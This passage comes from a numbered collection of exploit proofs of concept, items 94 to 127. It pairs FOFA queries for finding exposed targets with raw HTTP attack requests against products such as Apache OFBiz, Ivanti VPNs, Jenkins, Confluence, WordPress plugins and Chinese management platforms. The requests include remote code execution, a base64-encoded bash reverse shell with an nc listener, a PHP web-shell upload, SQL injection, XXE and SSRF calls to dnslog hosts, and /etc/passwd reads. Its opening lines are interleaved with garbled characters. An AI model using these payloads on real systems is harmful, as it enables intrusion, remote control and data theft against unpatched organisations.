0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

& m- t$ o2 b( S& V94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
. ?( C* W0 w$ i" eFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
4 R5 S6 u1 L8 d" `' A! oPOST /?g=obj_area_import_save HTTP/1.12 o8 i$ r, k$ |0 m6 S0 v
Host: x.x.x.x; S. |: L1 C+ J, h7 V' Q" S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
) |4 D! T2 u7 }8 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% U2 P$ S5 i; o2 \7 m8 i' `3 w
/ d! k  @4 D- F! S3 R
------WebKitFormBoundarybqvzqvmt
) A8 k+ Q  l* ~5 ?" ~6 YContent-Disposition: form-data; name="MAX_FILE_SIZE"  x. j5 W% {: l: N# ?9 n
" Q0 z2 x9 f: M9 i7 g+ T
10000000" c+ c) F- Y% J4 v
------WebKitFormBoundarybqvzqvmt# R" b8 {, R  N7 K! v" Z* D
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"6 |5 D5 z* p1 `$ N+ O1 t
Content-Type: text/plain
8 @3 b; I0 d& l: G0 ~* T7 M4 V8 `5 s0 Q2 j0 }4 d6 F; N3 v: A1 J
pxplitttsrjnyoafavcajwkvhxindhmu
7 \- O  o0 k( P. g: X------WebKitFormBoundarybqvzqvmt
! [0 j% {2 n/ n6 f& C# ^$ D- D  xContent-Disposition: form-data; name="submit_post"
% M3 G; Z/ O5 u6 a) u' z) I4 O: U) L5 y3 g' f- @$ p; @4 ^
obj_app_upfile
' Y7 ?: k- E2 P+ @& Q; W------WebKitFormBoundarybqvzqvmt" v8 }5 R  [, e2 N- N# o
Content-Disposition: form-data; name="__hash__"
: B& Y. c1 t0 l
2 b7 K6 T* a" G+ F! l0b9d6b1ab7479ab69d9f71b05e0e9445
, A; z) O/ S" i$ ]+ s+ l8 Y------WebKitFormBoundarybqvzqvmt--1 W1 H, K5 x. T* C
  P. A0 h) ^& P+ \5 {
* `) q$ p( O: r9 A  y' |, [4 r
& \3 @6 U* R) d5 ]3 g4 ~4 p) A1 _4 m
GET /attachements/xlskxknxa.txt HTTP/1.1
' E4 u( g( u/ w; `3 W, ^$ FHost: xx.xx.xx.xx
7 o! Q" d# ]. eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 w" r! P  H! g+ h& h
* l5 b5 o5 t# r$ s' q/ w$ l

3 |7 ~8 l7 ], y1 o: `) }1 v! m8 y' X4 \
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 of the following XML document
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1


106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own)
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 to 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
